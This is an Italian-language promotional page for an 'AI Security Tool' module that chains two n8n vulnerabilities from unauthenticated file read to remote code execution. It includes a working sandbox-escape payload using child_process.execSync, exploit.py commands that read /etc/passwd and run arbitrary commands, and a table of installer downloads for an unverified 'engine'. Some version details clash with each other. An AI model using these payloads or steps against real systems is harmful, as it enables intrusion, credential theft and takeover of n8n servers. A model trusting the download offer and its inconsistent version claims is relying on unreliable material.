🛡️ Modulo ufficiale di strumento di sicurezza AI per CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" Lettura arbitraria di file non autenticata e RCE tramite iniezione di espressioni - catena completa).
Navigazione del Sito: Home • Aggiornamenti • Download • Moduli
Questo modulo fornisce strumenti diagnostici e una catena di sfruttamento completa per istanze di automazione dei workflow n8n, denominata Ni8mare.
La catena di attacco combina una lettura arbitraria di file non autenticata (CVE-2026-21858) causata da una confusione di Content-Type con un bypass della sandbox tramite Expression Injection autenticata (CVE-2025-68613). Inviando una richiesta manipolata con Content-Type: application/json a un form di upload di file esposto, un attaccante controlla l'argomento filepath per leggere file interni di sistema (/proc/self/environ, configurazione e database SQLite). La encryptionKey e l'hash della password recuperati consentono la falsificazione offline di un cookie JWT di amministratore. Una volta autenticato, l'expression injection tramite this.process.mainModule.require permette di evadere la sandbox JavaScript per eseguire comandi arbitrari di sistema.
"Dalla lettura di file alla completa compromissione del sistema in tre passaggi."
Mentre la lettura di file richiede un workflow di form attivo con output binario, l'expression injection funziona in modo affidabile su installazioni n8n predefinite senza richiedere nodi speciali o permessi di sistema espliciti abilitati.
| Specifica | Valore Assegnato | Note |
|---|---|---|
| Identificatori CVE | CVE-2026-21858 + CVE-2025-68613 | Catena Completa: Lettura di File Non Autenticata fino a RCE |
| Livello di Gravità | Critico (CVSS v3.1: 10.0 + 9.9) | Catena RCE non autenticata |
| Tipi di Vulnerabilità | CWE-200 / CWE-94 | Confusione di Content-Type / Code Injection |
| Componente Affetto | n8n Workflow Automation Engine | Versioni <= 1.65.0 (AFR) / >= 0.211.0 (RCE) |
| Versioni Corrette | 1.121.0 (AFR) / 1.120.4+ (RCE) | Patch ufficiali del fornitore rilasciate |
| Privilegi Richiesti | Nessuno | Accesso iniziale non autenticato tramite form pubblico |
graph TD
A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
F -->|6. Execute Command| G[Full Remote Code Execution]={{ (function() {
var require = this.process.mainModule.require;
var execSync = require("child_process").execSync;
return execSync("id").toString();
})() }}1.121.0 o superiore.N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true e limitare le capacità dei processi nei container Docker.⚠️ IMPORTANTE: Questo modulo è progettato specificamente per l'esecuzione sicura e la diagnostica all'interno dell'ecosistema AI Security Tool. Utilizzare sempre moduli verificati provenienti da repository ufficiali.
Per eseguire gli script di monitoraggio e diagnostica, assicurarsi che il motore principale di AI Security Tool sia installato:
| OS / Piattaforma | Versione | Architettura / Formato | Data di Rilascio | Stato | Link di Download |
|---|---|---|---|---|---|
| 🪟 Windows | v6.3.20 | Installer x64 (.exe) | 2026-09-08 | 🟢 Ultima | Scarica .exe |
| 🪟 Windows | v6.3.20 | Portable x64 (.tar.gz) | 2026-09-08 | 🟢 Ultima | Scarica .tar.gz |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3 (.dmg) | 2026-09-05 | 🟢 Stabile | Scarica .dmg |
| 🐧 Linux | v5.3.27 | Universale x64 (.tar.gz) | 2026-09-01 | 🟢 Stabile | Scarica .tar.gz |
| 🤖 Android | v8a 5.3.27 | ARM64 APK (.apk) | 2026-09-01 | 🟢 Stabile | Scarica .apk |
# Read arbitrary file via diagnostic module uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwdExecute full attack chain with custom command
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"
Moduli di scansione delle vulnerabilità, script PoC e repository di ricerca mantenuti dalla nostra community:
5 moduli@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
3 moduli@ZeroDayEvil
@ZeroDayVPN
@ZeroDayEvil
2 moduli@ZeroDayEvil
@ZeroDayVPN
Questo strumento e l'analisi tecnica sono forniti esclusivamente per l'audit di sistemi autorizzati, la ricerca e il penetration testing.
L'esecuzione di catene di exploit contro target non autorizzati è illegale. Gli autori non si assumono alcuna responsabilità per accessi non autorizzati, perdita di dati o interruzioni dei sistemi. Operare rigorosamente all'interno di un ambito autorizzato.
Accogliamo con favore i contributi della community di ricerca sulla sicurezza! Aree di contribuzione principali:
AI Security Tool — Reimmaginare il workflow da terminale e l'automazione per i professionisti della cybersecurity.